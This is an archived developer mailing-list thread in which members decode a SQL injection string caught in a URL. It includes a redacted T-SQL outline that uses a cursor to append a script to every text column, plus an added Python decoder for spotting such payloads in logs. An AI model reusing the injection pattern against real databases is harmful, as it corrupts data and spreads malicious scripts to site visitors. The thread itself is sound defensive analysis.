Yep.... a bit cleaner than the last attack like this I saw.

-----Original Message-----
From: Russ Michaels [mailto:r...@michaels.me.uk] 
Sent: Friday, May 13, 2011 10:31 AM
To: cf-talk
Subject: Re: Can anyone decode this?


it is some very clever SQL though

On Fri, May 13, 2011 at 3:57 PM, Mark A. Kruger <mkru...@cfwebtools.com> wrote:

>
> This tries to append a malicious script to all the character columns in your
> DB in the hopes that you will select them and output them to a page (thus
> propagating the link).
>
> The script is a <script> block that redirects to a malicious site. Here's
> the basic outline with the script removed.
>
>
>
> DECLARE @T varchar(255),
>         @C varchar(4000)
> DECLARE Table_Cursor CURSOR FOR
>  select a.name,b.name
>  from sysobjects a,syscolumns b
>  where a.id=b.id and a.xtype='u'
>  and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
>
> OPEN Table_Cursor
> FETCH NEXT FROM Table_Cursor INTO @T,@C
> WHILE(@@FETCH_STATUS=0)
> BEGIN
>  exec('update ['+@T+'] set ['+@C+']=['+@C+']+''*****malicious script******'' where '+@C+' not like ''%*****malicious script***''')
>  FETCH NEXT FROM Table_Cursor INTO @T,@C
> END
>
> CLOSE Table_Cursor
> DEALLOCATE Table_Cursor
>
>
> Mark A. Kruger, MCSE, CFG
> (402) 408-3733 ext 105
> www.cfwebtools.com
> www.coldfusionmuse.com
> www.necfug.com
>
>
> -----Original Message-----
> From: Jeff Garza [mailto:j...@garzasixpack.com]
> Sent: Friday, May 13, 2011 9:39 AM
> To: cf-talk
> Subject: RE: Can anyone decode this?
>
>
> Put this in your SQL Query analyzer tool and change the EXEC at the end to
> PRINT. It should print out the SQL Statement for you to see what they were
> trying to do.
>
> Cheers,
>
> Jeff
>
> -----Original Message-----
> From: Che Vilnonis [mailto:ch...@asitv.com]
> Sent: Friday, May 13, 2011 7:31 AM
> To: cf-talk
> Subject: Can anyone decode this?
>
>
> Can anyone decode this? This was a URL attack that was caught by some custom
> code. I tried decoding the string at
> http://meyerweb.com/eric/tools/dencoder/ but had no luck.
>
> 113|736;DECLARE @S CHAR(4000);SET @S=CAST(0x… AS CHAR(4000));EXEC(@S);
>
> Thanks, Che
> 
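
The decoding Jeff describes (swap EXEC for PRINT) can also be done offline, without pasting the string into a database tool. The following is an added example, not code from anyone in this thread: it pulls the hex literal out of a `CAST(0x… AS CHAR(n))` wrapper, decodes it as text, and flags the traits Mark lists in his outline. The function names, trait labels and the sample request are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# CAST(0x<hex> AS [N][VAR]CHAR(n)): the wrapper used in the request quoted above.
# The hex class tolerates whitespace and ">" so mail-wrapped copies still parse.
CAST_HEX = re.compile(
    r"CAST\s*\(\s*0x([0-9A-F\s>]+?)\s+AS\s+(N?)(?:VAR)?CHAR\s*\(\s*(?:\d+|MAX)\s*\)\s*\)",
    re.IGNORECASE)

# Traits of the decoded statement as described in the thread (labels are this example's).
TRAITS = [
    ("enumerates catalog tables", re.compile(r"\bsys(objects|columns)\b", re.I)),
    ("cursor loop", re.compile(r"\bCURSOR\b.*\bFETCH\b", re.I | re.S)),
    ("dynamic EXEC of UPDATE", re.compile(r"\bexec\s*\(\s*'\s*update\b", re.I)),
]

def decode_payloads(raw):
    """Decode every hex literal wrapped in CAST(... AS CHAR); nothing is executed."""
    decoded = []
    for m in CAST_HEX.finditer(unquote_plus(raw)):
        digits = re.sub(r"[^0-9A-Fa-f]", "", m.group(1))
        digits = digits[: len(digits) // 2 * 2]  # drop a dangling nibble if truncated
        data = bytes.fromhex(digits)
        # NCHAR/NVARCHAR literals are UTF-16LE; CHAR/VARCHAR are single-byte.
        decoded.append(data.decode("utf-16-le" if m.group(2) else "latin-1", "replace"))
    return decoded

def triage(raw):
    """Return (decoded_sql, [trait labels]) for each encoded statement in a request."""
    return [(sql, [name for name, rx in TRAITS if rx.search(sql)])
            for sql in decode_payloads(raw)]

# Constructed sample: the redacted outline from the thread, shortened, with a placeholder.
SAMPLE_SQL = ("DECLARE Table_Cursor CURSOR FOR select a.name,b.name "
              "from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' "
              "OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C "
              "BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''PLACEHOLDER''') END")
_hex = SAMPLE_SQL.encode("latin-1").hex().upper()
_wrapped = "\n> ".join(_hex[i:i + 76] for i in range(0, len(_hex), 76))
SAMPLE_REQUEST = ("id=113;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x" + _wrapped
                  + "%20AS%20CHAR(4000));EXEC(@S);")

if __name__ == "__main__":
    for sql, traits in triage(SAMPLE_REQUEST):
        print(traits)
        print(sql)
```

The same patterns can be run over web server logs to find other requests carrying this wrapper.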



Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:344498